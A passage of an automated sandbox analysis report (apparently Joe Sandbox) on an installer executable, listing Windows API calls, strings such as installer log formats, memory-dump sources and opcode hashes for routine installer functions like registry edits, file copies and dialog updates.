                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                              • String ID: f
                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                              • MulDiv.KERNEL32(0003D800,00000064,046024F0), ref: 00403295
                                                                                                                                                                              • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                              Strings
                                                                                                                                                                              • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                              • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                              • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                              • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                              • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                              • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                              • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                              • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                              • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                              • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                              • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                              • String ID: !
                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcatwsprintf
                                                                                                                                                                              • String ID: %02x%c$...
                                                                                                                                                                              • API String ID: 3065427908-1057055748
                                                                                                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                              APIs
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                              • API String ID: 2266616436-4211696005
                                                                                                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1599320355-0
                                                                                                                                                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
